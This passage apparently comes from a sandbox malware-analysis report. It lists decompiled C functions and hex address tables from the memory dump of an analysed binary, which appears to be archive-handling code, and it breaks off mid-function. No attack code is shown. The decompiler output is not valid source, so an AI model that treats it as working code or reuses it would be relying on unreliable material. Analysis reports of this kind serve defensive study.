                                                                                                    0x003d2d9b
                                                                                                    0x003d2d9f
                                                                                                    0x003d2df1
                                                                                                    0x003d2df4
                                                                                                    0x003d2df8
                                                                                                    0x00000000
                                                                                                    0x003d2dfd
                                                                                                    0x003d2da4
                                                                                                    0x003d2da8
                                                                                                    0x003d2db4
                                                                                                    0x003d2db7
                                                                                                    0x003d2db9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d2dbb
                                                                                                    0x003d2dc0
                                                                                                    0x003d2dc3
                                                                                                    0x003d2dc6
                                                                                                    0x003d2dc8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d2dca
                                                                                                    0x003d2dd0
                                                                                                    0x003d2dd2
                                                                                                    0x003d2dd4
                                                                                                    0x003d2dd9
                                                                                                    0x003d2de7
                                                                                                    0x003d2de9
                                                                                                    0x003d2deb
                                                                                                    0x003d2ef9
                                                                                                    0x003d2efc
                                                                                                    0x003d2f04
                                                                                                    0x003d2f09
                                                                                                    0x003d2f0e
                                                                                                    0x003d2f12
                                                                                                    0x00000000
                                                                                                    0x003d2f12
                                                                                                    0x00000000
                                                                                                    0x003d2deb
                                                                                                    0x003d2dcc
                                                                                                    0x003d2dce
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d2dce
                                                                                                    0x003d2d40
                                                                                                    0x003d2d43
                                                                                                    0x003d2d4a
                                                                                                    0x003d2d4c
                                                                                                    0x003d2d4f
                                                                                                    0x003d2d56
                                                                                                    0x003d2d59
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d2d67
                                                                                                    0x003d2d6c
                                                                                                    0x003d2d70
                                                                                                    0x003d2d73
                                                                                                    0x003d2d77
                                                                                                    0x003d2d7c
                                                                                                    0x003d2d7c
                                                                                                    0x003d2d7f
                                                                                                    0x003d2d7f
                                                                                                    0x00000000
                                                                                                    0x003d2d7f
                                                                                                    0x003d2cf6
                                                                                                    0x003d2c71
                                                                                                    0x003d2c73
                                                                                                    0x003d2c78
                                                                                                    0x003d2c7b
                                                                                                    0x003d2c7d
                                                                                                    0x003d2c80
                                                                                                    0x003d2c83
                                                                                                    0x003d2c89
                                                                                                    0x003d2c89
                                                                                                    0x003d2c8f
                                                                                                    0x003d2c9a
                                                                                                    0x003d2c9f
                                                                                                    0x003d2ca3
                                                                                                    0x003d2ca6
                                                                                                    0x003d2ca9
                                                                                                    0x003d2cac
                                                                                                    0x00000000
                                                                                                    0x003d2cac
                                                                                                    0x003d2be2
                                                                                                    0x003d2ba8
                                                                                                    0x00000000
                                                                                                    0x003d2ba8
                                                                                                    0x003d2b8c
                                                                                                    0x003d2b2c
                                                                                                    0x003d2b2c
                                                                                                    0x00000000
                                                                                                    0x003d2b2c

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003D29D9
                                                                                                      • Part of subcall function 003CEE23: __EH_prolog.LIBCMT ref: 003CEE28
                                                                                                      • Part of subcall function 003EF23F: _CxxThrowException.MSVCRT(?,0042FFC8), ref: 003EF265
                                                                                                      • Part of subcall function 003D6106: __EH_prolog.LIBCMT ref: 003D610B
                                                                                                      • Part of subcall function 003D2FC1: __EH_prolog.LIBCMT ref: 003D2FC6
                                                                                                      • Part of subcall function 003D23C0: __EH_prolog.LIBCMT ref: 003D23C5
                                                                                                      • Part of subcall function 003D23C0: strcmp.MSVCRT ref: 003D2479
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$ExceptionThrowstrcmp
                                                                                                    • String ID: Scanning error
                                                                                                    • API String ID: 1140649431-2691707340
                                                                                                    • Opcode ID: d13a9306fea9f5930325a6331685aa262ddb9a9e3ef4f48f439b08ba5980ac8f
                                                                                                    • Instruction ID: 8965b981f2bd2fb22fbee731bb5a732b8a5d8b09eb47d4812f980c617dc66784
                                                                                                    • Opcode Fuzzy Hash: d13a9306fea9f5930325a6331685aa262ddb9a9e3ef4f48f439b08ba5980ac8f
                                                                                                    • Instruction Fuzzy Hash: F102AD72904259DFCF16DFA4D894AEEBBB5BF24310F1444AAE846AB352DB309E44CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003CA39F Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 284COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 94%
                                                                                                    			E003CA39F(intOrPtr* __ecx, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t138;
				signed int* _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int _t160;
				signed int _t161;
				signed int* _t166;
				signed int _t171;
				void* _t172;
				intOrPtr _t177;
				signed int _t178;
				intOrPtr _t179;
				void* _t186;
				void* _t188;
				void* _t190;
				signed int _t195;
				signed int _t202;
				signed int _t211;
				signed int _t215;
				void* _t219;
				signed int _t221;
				signed int _t222;
				intOrPtr* _t228;
				signed int _t229;
				signed int _t231;
				void* _t232;
				void* _t265;

				_t265 = __fp0;
				E0041F1B0(E00424196, _t232);
				_t228 = __ecx;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				if( *(__ecx + 8) == 0) {
					 *(__ecx + 8) = 1;
				}
				_t214 =  *(_t228 + 4);
				_t186 = 7;
				_t138 = E0041F470( *_t228, _t186, _t214);
				 *(_t232 - 0x24) = 0x40000000;
				if(_t214 > 0 || _t138 > 0x40000000) {
					_t188 = 0x1e;
					 *(_t232 - 0x1c) = E0041F470(_t138, _t188, _t214);
					 *(_t232 - 0x18) = _t214;
				} else {
					 *(_t232 - 0x24) = _t138;
					 *(_t232 - 0x1c) = 1;
					 *(_t232 - 0x18) = 0;
				}
				_t221 =  *(_t228 + 8);
				 *((intOrPtr*)(_t232 - 0x84)) = 0;
				 *((intOrPtr*)(_t232 - 0x80)) = 0;
				if(_t221 > 1 ||  *((intOrPtr*)( *((intOrPtr*)(_t232 + 0xc)))) != 0) {
					 *(_t232 - 0x14) = 0;
					 *(_t232 - 0x10) = 0;
					 *(_t232 - 4) = 0;
					_push((_t221 << 5) + 4);
					_t143 = E003B1E0C();
					 *(_t232 - 0x2c) = _t143;
					 *(_t232 - 4) = 1;
					if(_t143 == 0) {
						_t144 = 0;
						__eflags = 0;
					} else {
						_push(L003C96FC);
						 *_t143 = _t221;
						 *(_t232 - 0x20) =  &(_t143[1]);
						E0041F2CA( &(_t143[1]), 0x20, _t221, E003CA8A0);
						_t144 =  *(_t232 - 0x20);
					}
					_t222 =  *(_t232 + 8);
					_t190 = 0;
					 *(_t232 - 4) = 0;
					 *(_t232 - 0x14) = _t144;
					if( *(_t228 + 8) <= 0) {
						L14:
						L003C7805(_t232 - 0xb4, _t214, _t245);
						 *(_t232 + 8) = 0;
						if( *(_t228 + 8) <= 0) {
							L23:
							_t146 = E003CA848(_t232 - 0x14);
							if(_t146 != 0) {
								L29:
								if(__eflags > 0) {
									_t146 = _t146 & 0x0000ffff | 0x80070000;
									__eflags = _t146;
								}
								_t229 = _t146;
								L33:
								 *(_t232 - 4) =  *(_t232 - 4) | 0xffffffff;
								E003CA889(_t232 - 0x14);
								_t148 = _t229;
								goto L52;
							}
							_t195 =  *(_t228 + 8);
							 *(_t232 + 8) = 0;
							if(_t195 <= 0) {
								L28:
								 *(_t232 - 4) =  *(_t232 - 4) | 0xffffffff;
								E003CA889(_t232 - 0x14);
								goto L41;
							}
							_t166 =  *(_t232 - 0x14) + 8;
							while(1) {
								_t214 =  *_t166;
								if(_t214 != 0) {
									break;
								}
								 *(_t232 + 8) =  *(_t232 + 8) + 1;
								_t166 =  &(_t166[8]);
								if( *(_t232 + 8) < _t195) {
									continue;
								}
								goto L28;
							}
							_t229 = _t214;
							goto L33;
						}
						 *((intOrPtr*)(_t232 - 0x28)) = 0;
						while(1) {
							_t205 =  *((intOrPtr*)(_t232 - 0x28)) +  *(_t232 - 0x14);
							_t168 =  *((intOrPtr*)(_t232 + 0xc));
							 *(_t232 - 0x20) =  *((intOrPtr*)(_t232 - 0x28)) +  *(_t232 - 0x14);
							if( *((intOrPtr*)( *((intOrPtr*)(_t232 + 0xc)))) == 0) {
								_t214 = E003CA7F1;
								_t146 = E00417E80(_t205, E003CA7F1, _t205);
							} else {
								L003C7D14(_t168,  *(_t232 + 8), _t232 - 0x2c);
								_t214 = E003CA7F1;
								_t146 = L00417EC0( *(_t232 - 0x20), E003CA7F1,  *(_t232 - 0x20),  *(_t232 - 0x2c));
							}
							if( *( *(_t232 - 0x20)) != 0) {
								 *(_t232 - 0x10) =  *(_t232 - 0x10) + 1;
							}
							if(_t146 != 0) {
								goto L29;
							}
							 *(_t232 + 8) =  *(_t232 + 8) + 1;
							 *((intOrPtr*)(_t232 - 0x28)) =  *((intOrPtr*)(_t232 - 0x28)) + 0x20;
							if( *(_t232 + 8) <  *(_t228 + 8)) {
								continue;
							}
							goto L23;
						}
						goto L29;
					} else {
						_t219 = 0;
						do {
							_t171 =  *(_t232 - 0x14);
							 *(_t171 + _t219 + 4) = _t222;
							_t172 = _t171 + _t219;
							_t190 = _t190 + 1;
							_t219 = _t219 + 0x20;
							 *(_t172 + 0x18) =  *(_t232 - 0x1c);
							 *(_t172 + 0x1c) =  *(_t232 - 0x18);
							 *((intOrPtr*)(_t172 + 8)) = 0;
							 *(_t172 + 0x10) =  *(_t232 - 0x24);
							_t245 = _t190 -  *(_t228 + 8);
							_t222 =  *(_t232 + 8);
						} while (_t190 <  *(_t228 + 8));
						goto L14;
					}
				} else {
					L003C7805(_t232 - 0xb4, _t214, __eflags);
					_t177 =  *0x43a464; // 0x1
					_t211 =  *(_t232 - 0x1c);
					_t222 =  *(_t232 + 8);
					 *((intOrPtr*)(_t232 + 0xc)) = _t177;
					_t178 =  *(_t232 - 0x18);
					 *(_t232 - 0x14) = _t211;
					__eflags = _t178;
					 *(_t232 - 0x10) = _t178;
					if(_t178 > 0) {
						goto L36;
						do {
							do {
								L36:
								_t214 =  *(_t232 - 0x24);
								_t179 = E003CA6D7( *((intOrPtr*)(_t232 + 0xc)),  *(_t232 - 0x24),  *0x43a464);
								__eflags = _t222;
								 *((intOrPtr*)(_t232 + 0xc)) = _t179;
								if(_t222 == 0) {
									goto L38;
								}
								_t148 =  *((intOrPtr*)( *_t222 + 8))();
								__eflags = _t148;
								if(_t148 != 0) {
									L52:
									 *[fs:0x0] =  *((intOrPtr*)(_t232 - 0xc));
									return _t148;
								}
								L38:
								_t87 = _t232 - 0x14;
								 *_t87 =  *(_t232 - 0x14) + 0xffffffff;
								__eflags =  *_t87;
								asm("adc dword [ebp-0x10], 0xffffffff");
							} while ( *_t87 != 0);
							__eflags =  *(_t232 - 0x14);
						} while ( *(_t232 - 0x14) > 0);
						L40:
						_t91 = _t228 + 0x28;
						 *_t91 =  *(_t228 + 0x28) +  *((intOrPtr*)(_t232 + 0xc));
						__eflags =  *_t91;
						L41:
						if( *(_t228 + 0x28) != 0x12345678 || _t222 == 0) {
							L44:
							_push(_t232 - 0x64);
							 *(_t232 - 0x34) = 0;
							 *((intOrPtr*)(_t232 - 0x30)) = 0;
							L003C78B0(_t232 - 0xb4, _t214, _t259);
							_t215 =  *(_t228 + 8) *  *(_t232 - 0x24) >> 0x20;
							 *((intOrPtr*)(_t232 - 0x44)) = 0;
							 *((intOrPtr*)(_t232 - 0x40)) = 0;
							 *((intOrPtr*)(_t232 - 0x3c)) = 0;
							 *((intOrPtr*)(_t232 - 0x38)) = 0;
							 *(_t232 - 0x34) = 1;
							 *((intOrPtr*)(_t232 - 0x30)) = 0;
							 *(_t232 - 0x1c) = L003C7AE4(_t232 - 0x64, E0041F4B0(E0041F4B0( *(_t228 + 8) *  *(_t232 - 0x24), _t215,  *(_t232 - 0x1c),  *(_t232 - 0x18)), _t215, 0x80, 0), _t215);
							 *(_t232 - 0x18) = _t215;
							 *(_t228 + 0x18) = E0041F380(_t157, _t215,  *(_t228 + 8), 0);
							 *(_t228 + 0x1c) = _t215;
							 *((intOrPtr*)(_t228 + 0x20)) = L003C79ED(0, _t232 - 0x64, _t222, _t228, _t265);
							 *(_t228 + 0x24) = _t215;
							if(_t222 == 0) {
								L51:
								_t148 = 0;
								goto L52;
							}
							_t160 =  *((intOrPtr*)(_t228 + 0xc));
							 *(_t232 + 8) = _t160;
							if(_t160 == 0) {
								_t161 = 0;
								_t231 = 0;
								__eflags = 0;
							} else {
								_t161 =  *(_t228 + 0x10);
								_t202 =  *(_t228 + 0x14);
								_t262 = _t161 | _t202;
								if((_t161 | _t202) == 0) {
									_t161 =  *(_t228 + 0x18);
									_t231 =  *(_t228 + 0x1c);
								} else {
									_t231 = _t202;
								}
							}
							E003CA00D(0, _t222, _t232 - 0x64, _t222, _t231, _t262, _t265, 0,  *(_t232 - 0x1c),  *(_t232 - 0x18),  *(_t232 + 8), _t161, _t231, 0);
							_t148 =  *((intOrPtr*)( *_t222 + 8))();
							if(_t148 != 0) {
								goto L52;
							} else {
								goto L51;
							}
						} else {
							_t148 =  *((intOrPtr*)( *_t222 + 8))();
							_t259 = _t148;
							if(_t148 != 0) {
								goto L52;
							}
							goto L44;
						}
					}
					__eflags = _t211;
					if(_t211 <= 0) {
						goto L40;
					}
					goto L36;
				}
			}


































                                                                                                    0x003ca39f
                                                                                                    0x003ca3a4
                                                                                                    0x003ca3b1
                                                                                                    0x003ca3b9
                                                                                                    0x003ca3bc
                                                                                                    0x003ca3bf
                                                                                                    0x003ca3c2
                                                                                                    0x003ca3c5
                                                                                                    0x003ca3c8
                                                                                                    0x003ca3ca
                                                                                                    0x003ca3ca
                                                                                                    0x003ca3d3
                                                                                                    0x003ca3d8
                                                                                                    0x003ca3d9
                                                                                                    0x003ca3e5
                                                                                                    0x003ca3e8
                                                                                                    0x003ca3f0
                                                                                                    0x003ca3f6
                                                                                                    0x003ca3f9
                                                                                                    0x003ca3fe
                                                                                                    0x003ca3fe
                                                                                                    0x003ca401
                                                                                                    0x003ca408
                                                                                                    0x003ca408
                                                                                                    0x003ca40b
                                                                                                    0x003ca40e
                                                                                                    0x003ca417
                                                                                                    0x003ca41a
                                                                                                    0x003ca427
                                                                                                    0x003ca42a
                                                                                                    0x003ca42f
                                                                                                    0x003ca438
                                                                                                    0x003ca439
                                                                                                    0x003ca43f
                                                                                                    0x003ca444
                                                                                                    0x003ca448
                                                                                                    0x003ca46a
                                                                                                    0x003ca46a
                                                                                                    0x003ca44a
                                                                                                    0x003ca44a
                                                                                                    0x003ca44f
                                                                                                    0x003ca45d
                                                                                                    0x003ca460
                                                                                                    0x003ca465
                                                                                                    0x003ca465
                                                                                                    0x003ca46c
                                                                                                    0x003ca46f
                                                                                                    0x003ca474
                                                                                                    0x003ca477
                                                                                                    0x003ca47a
                                                                                                    0x003ca4a8
                                                                                                    0x003ca4ae
                                                                                                    0x003ca4b6
                                                                                                    0x003ca4b9
                                                                                                    0x003ca519
                                                                                                    0x003ca51c
                                                                                                    0x003ca523
                                                                                                    0x003ca557
                                                                                                    0x003ca557
                                                                                                    0x003ca55e
                                                                                                    0x003ca55e
                                                                                                    0x003ca55e
                                                                                                    0x003ca563
                                                                                                    0x003ca569
                                                                                                    0x003ca569
                                                                                                    0x003ca570
                                                                                                    0x003ca575
                                                                                                    0x00000000
                                                                                                    0x003ca575
                                                                                                    0x003ca525
                                                                                                    0x003ca528
                                                                                                    0x003ca52d
                                                                                                    0x003ca546
                                                                                                    0x003ca546
                                                                                                    0x003ca54d
                                                                                                    0x00000000
                                                                                                    0x003ca54d
                                                                                                    0x003ca532
                                                                                                    0x003ca535
                                                                                                    0x003ca535
                                                                                                    0x003ca539
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ca53b
                                                                                                    0x003ca53e
                                                                                                    0x003ca544
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ca544
                                                                                                    0x003ca567
                                                                                                    0x00000000
                                                                                                    0x003ca567
                                                                                                    0x003ca4bb
                                                                                                    0x003ca4be
                                                                                                    0x003ca4c4
                                                                                                    0x003ca4c6
                                                                                                    0x003ca4c9
                                                                                                    0x003ca4ce
                                                                                                    0x003ca4f2
                                                                                                    0x003ca4f7
                                                                                                    0x003ca4d0
                                                                                                    0x003ca4d9
                                                                                                    0x003ca4e4
                                                                                                    0x003ca4ea
                                                                                                    0x003ca4ea
                                                                                                    0x003ca501
                                                                                                    0x003ca503
                                                                                                    0x003ca503
                                                                                                    0x003ca508
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ca50a
                                                                                                    0x003ca50d
                                                                                                    0x003ca517
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ca517
                                                                                                    0x00000000
                                                                                                    0x003ca47c
                                                                                                    0x003ca47c
                                                                                                    0x003ca47e
                                                                                                    0x003ca47e
                                                                                                    0x003ca481
                                                                                                    0x003ca488
                                                                                                    0x003ca48a
                                                                                                    0x003ca48b
                                                                                                    0x003ca48e
                                                                                                    0x003ca494
                                                                                                    0x003ca49a
                                                                                                    0x003ca49d
                                                                                                    0x003ca4a0
                                                                                                    0x003ca4a3
                                                                                                    0x003ca4a3
                                                                                                    0x00000000
                                                                                                    0x003ca47e
                                                                                                    0x003ca57c
                                                                                                    0x003ca582
                                                                                                    0x003ca587
                                                                                                    0x003ca58c
                                                                                                    0x003ca58f
                                                                                                    0x003ca592
                                                                                                    0x003ca595
                                                                                                    0x003ca598
                                                                                                    0x003ca59b
                                                                                                    0x003ca59d
                                                                                                    0x003ca5a0
                                                                                                    0x00000000
                                                                                                    0x003ca5a6
                                                                                                    0x003ca5a6
                                                                                                    0x003ca5a6
                                                                                                    0x003ca5ac
                                                                                                    0x003ca5b2
                                                                                                    0x003ca5b7
                                                                                                    0x003ca5b9
                                                                                                    0x003ca5bc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ca5c2
                                                                                                    0x003ca5c5
                                                                                                    0x003ca5c7
                                                                                                    0x003ca6c6
                                                                                                    0x003ca6cc
                                                                                                    0x003ca6d4
                                                                                                    0x003ca6d4
                                                                                                    0x003ca5cd
                                                                                                    0x003ca5cd
                                                                                                    0x003ca5cd
                                                                                                    0x003ca5cd
                                                                                                    0x003ca5d1
                                                                                                    0x003ca5d1
                                                                                                    0x003ca5d7
                                                                                                    0x003ca5d7
                                                                                                    0x003ca5dc
                                                                                                    0x003ca5df
                                                                                                    0x003ca5df
                                                                                                    0x003ca5df
                                                                                                    0x003ca5e2
                                                                                                    0x003ca5e9
                                                                                                    0x003ca5fe
                                                                                                    0x003ca607
                                                                                                    0x003ca608
                                                                                                    0x003ca60b
                                                                                                    0x003ca60e
                                                                                                    0x003ca619
                                                                                                    0x003ca61f
                                                                                                    0x003ca622
                                                                                                    0x003ca625
                                                                                                    0x003ca62a
                                                                                                    0x003ca62d
                                                                                                    0x003ca634
                                                                                                    0x003ca654
                                                                                                    0x003ca65a
                                                                                                    0x003ca664
                                                                                                    0x003ca66a
                                                                                                    0x003ca672
                                                                                                    0x003ca677
                                                                                                    0x003ca67a
                                                                                                    0x003ca6c4
                                                                                                    0x003ca6c4
                                                                                                    0x00000000
                                                                                                    0x003ca6c4
                                                                                                    0x003ca67c
                                                                                                    0x003ca681
                                                                                                    0x003ca684
                                                                                                    0x003ca69e
                                                                                                    0x003ca6a0
                                                                                                    0x003ca6a0
                                                                                                    0x003ca686
                                                                                                    0x003ca686
                                                                                                    0x003ca689
                                                                                                    0x003ca68e
                                                                                                    0x003ca690
                                                                                                    0x003ca696
                                                                                                    0x003ca699
                                                                                                    0x003ca692
                                                                                                    0x003ca692
                                                                                                    0x003ca692
                                                                                                    0x003ca690
                                                                                                    0x003ca6b4
                                                                                                    0x003ca6bd
                                                                                                    0x003ca6c2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ca5ef
                                                                                                    0x003ca5f3
                                                                                                    0x003ca5f6
                                                                                                    0x003ca5f8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ca5f8
                                                                                                    0x003ca5e9
                                                                                                    0x003ca5a2
                                                                                                    0x003ca5a4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ca5a4

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003CA3A4
                                                                                                      • Part of subcall function 00417E80: _beginthreadex.MSVCRT ref: 00417E94
                                                                                                    • __aulldiv.LIBCMT ref: 003CA65F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog__aulldiv_beginthreadex
                                                                                                    • String ID:
                                                                                                    • API String ID: 2901374343-3916222277
                                                                                                    • Opcode ID: ef6eb217cf15400c67788a0c31b08325cb166b63f6715af55ed324ce92998de1
                                                                                                    • Instruction ID: 4003c70de616878bc74880f2412e987fdbbb238e31f55c0e121021f9737365ba
                                                                                                    • Opcode Fuzzy Hash: ef6eb217cf15400c67788a0c31b08325cb166b63f6715af55ed324ce92998de1
                                                                                                    • Instruction Fuzzy Hash: 1FB16BB1D006099FCB25DFA5C880AAEBBB1FF48318F24852EE45AE7251C7349E81CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003D81F9 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 204COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 91%
                                                                                                    			E003D81F9(void* __ecx, void* __eflags) {
				intOrPtr* _t108;
				signed int _t109;
				intOrPtr* _t112;
				signed int _t113;
				intOrPtr* _t116;
				signed int _t117;
				intOrPtr* _t119;
				signed int _t120;
				signed int _t124;
				signed int _t127;
				char* _t128;
				char* _t131;
				void* _t136;
				intOrPtr _t139;
				intOrPtr _t159;
				void* _t173;
				void* _t174;
				signed int _t177;
				void* _t178;
				intOrPtr* _t179;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t187;

				E0041F1B0(E0042528C, _t187);
				_t185 = __ecx;
				_t179 = __ecx + 0x50;
				 *((intOrPtr*)(__ecx + 0x58)) = 0;
				 *((char*)(__ecx + 0x60)) = 0;
				asm("sbb ecx, [ebp+0x10]");
				 *((intOrPtr*)(__ecx + 0x70)) =  *((intOrPtr*)(__ecx + 0x68)) -  *((intOrPtr*)(_t187 + 0xc));
				 *_t179 = 0;
				 *((intOrPtr*)(__ecx + 0x5c)) = 0;
				 *((intOrPtr*)(__ecx + 0x74)) =  *((intOrPtr*)(__ecx + 0x6c));
				 *((intOrPtr*)(_t179 + 4)) = 0;
				E003D81CD(__ecx + 0x78);
				 *(_t187 - 0x24) = 0;
				 *((short*)(_t187 - 0x22)) = 0;
				 *(_t187 - 0x1c) = 0;
				_t108 =  *((intOrPtr*)(_t187 + 8));
				 *(_t187 - 4) = 0;
				_t109 =  *((intOrPtr*)( *_t108 + 0x20))(_t108, 0x47, _t187 - 0x24, _t178, _t184, _t136);
				 *(_t187 - 0x10) = _t109;
				if(_t109 == 0) {
					 *((intOrPtr*)(__ecx + 0x7c)) = E003D818C(_t187 - 0x24, __ecx + 0x7b);
					E003B92C9(_t187 - 0x24);
					 *(_t187 - 0x24) = 0;
					 *((short*)(_t187 - 0x22)) = 0;
					 *(_t187 - 0x1c) = 0;
					_t112 =  *((intOrPtr*)(_t187 + 8));
					 *(_t187 - 4) = 1;
					_t113 =  *((intOrPtr*)( *_t112 + 0x20))(_t112, 0x48, _t187 - 0x24);
					__eflags = _t113;
					 *(_t187 - 0x10) = _t113;
					if(_t113 == 0) {
						 *((intOrPtr*)(__ecx + 0x80)) = E003D818C(_t187 - 0x24, 0);
						E003B92C9(_t187 - 0x24);
						 *(_t187 - 0x24) = 0;
						 *((short*)(_t187 - 0x22)) = 0;
						 *(_t187 - 0x1c) = 0;
						_t116 =  *((intOrPtr*)(_t187 + 8));
						 *(_t187 - 4) = 2;
						_t117 =  *((intOrPtr*)( *_t116 + 0x20))(_t116, 0x37, _t187 - 0x24);
						__eflags = _t117;
						 *(_t187 - 0x10) = _t117;
						if(_t117 == 0) {
							__eflags =  *(_t187 - 0x24);
							if( *(_t187 - 0x24) != 0) {
								__eflags =  *(_t187 - 0x24) - 8;
								_t131 =  *(_t187 - 0x1c);
								if( *(_t187 - 0x24) != 8) {
									_t131 = L"Unknown error";
								}
								E003B2ECB(_t185 + 0x90, _t131);
							}
							E003B92C9(_t187 - 0x24);
							 *(_t187 - 0x24) = 0;
							 *((short*)(_t187 - 0x22)) = 0;
							 *(_t187 - 0x1c) = 0;
							_t119 =  *((intOrPtr*)(_t187 + 8));
							 *(_t187 - 4) = 3;
							_t120 =  *((intOrPtr*)( *_t119 + 0x20))(_t119, 0x49, _t187 - 0x24);
							__eflags = _t120;
							 *(_t187 - 0x10) = _t120;
							if(_t120 == 0) {
								__eflags =  *(_t187 - 0x24);
								if( *(_t187 - 0x24) != 0) {
									__eflags =  *(_t187 - 0x24) - 8;
									_t128 =  *(_t187 - 0x1c);
									if( *(_t187 - 0x24) != 8) {
										_t128 = L"Unknown warning";
									}
									E003B2ECB(_t185 + 0x9c, _t128);
								}
								 *(_t187 - 4) =  *(_t187 - 4) | 0xffffffff;
								E003B92C9(_t187 - 0x24);
								__eflags =  *(_t187 + 0x14);
								if( *(_t187 + 0x14) == 0) {
									L19:
									_push(_t185 + 0x60);
									_push(_t185 + 0x58);
									_t173 = 0x2c;
									_t124 = E003D8466( *((intOrPtr*)(_t187 + 8)), _t173);
									__eflags = _t124;
									if(_t124 == 0) {
										_push(_t187 + 0x17);
										_push(_t179);
										_t174 = 0x24;
										_t124 = E003D8510( *((intOrPtr*)(_t187 + 8)), _t174);
										__eflags = _t124;
										if(_t124 == 0) {
											asm("adc eax, [edi+0x4]");
											 *((intOrPtr*)(_t187 + 0xc)) =  *((intOrPtr*)(_t187 + 0xc)) +  *_t179;
											_t159 =  *((intOrPtr*)(_t185 + 0x68));
											_t127 =  *(_t185 + 0x6c);
											asm("sbb edi, [ebp+0x10]");
											__eflags =  *(_t185 + 0x60);
											 *((intOrPtr*)(_t185 + 0x70)) = _t159 -  *((intOrPtr*)(_t187 + 0xc));
											 *(_t185 + 0x74) = _t127;
											if( *(_t185 + 0x60) != 0) {
												_t139 =  *((intOrPtr*)(_t185 + 0x58));
												_t177 =  *(_t185 + 0x5c);
												 *(_t187 - 0x10) = _t177;
												_t183 = _t139 +  *((intOrPtr*)(_t187 + 0xc));
												asm("adc edx, [ebp+0x10]");
												__eflags = _t177 - _t127;
												if(__eflags > 0) {
													L29:
													 *((char*)(_t185 + 0x79)) = 1;
												} else {
													if(__eflags < 0) {
														L25:
														 *((intOrPtr*)(_t185 + 0x70)) = _t139;
														 *((intOrPtr*)(_t185 + 0x88)) = _t159 - _t183;
														asm("sbb eax, edx");
														 *(_t185 + 0x74) =  *(_t187 - 0x10);
														 *((char*)(_t185 + 0x78)) = 1;
														 *(_t185 + 0x8c) = _t127;
													} else {
														__eflags = _t183 - _t159;
														if(_t183 >= _t159) {
															__eflags = _t177 - _t127;
															if(__eflags >= 0) {
																if(__eflags > 0) {
																	goto L29;
																} else {
																	__eflags = _t183 - _t159;
																	if(_t183 > _t159) {
																		goto L29;
																	}
																}
															}
														} else {
															goto L25;
														}
													}
												}
											}
											goto L30;
										}
									}
								} else {
									__eflags =  *(_t185 + 0x7b);
									if( *(_t185 + 0x7b) == 0) {
										L30:
										_t124 = 0;
										__eflags = 0;
									} else {
										__eflags =  *(_t185 + 0x7c) & 0x00000001;
										if(( *(_t185 + 0x7c) & 0x00000001) != 0) {
											goto L30;
										} else {
											goto L19;
										}
									}
								}
							} else {
								E003B92C9(_t187 - 0x24);
								_t124 =  *(_t187 - 0x10);
							}
						} else {
							E003B92C9(_t187 - 0x24);
							_t124 =  *(_t187 - 0x10);
						}
					} else {
						E003B92C9(_t187 - 0x24);
						_t124 =  *(_t187 - 0x10);
					}
				} else {
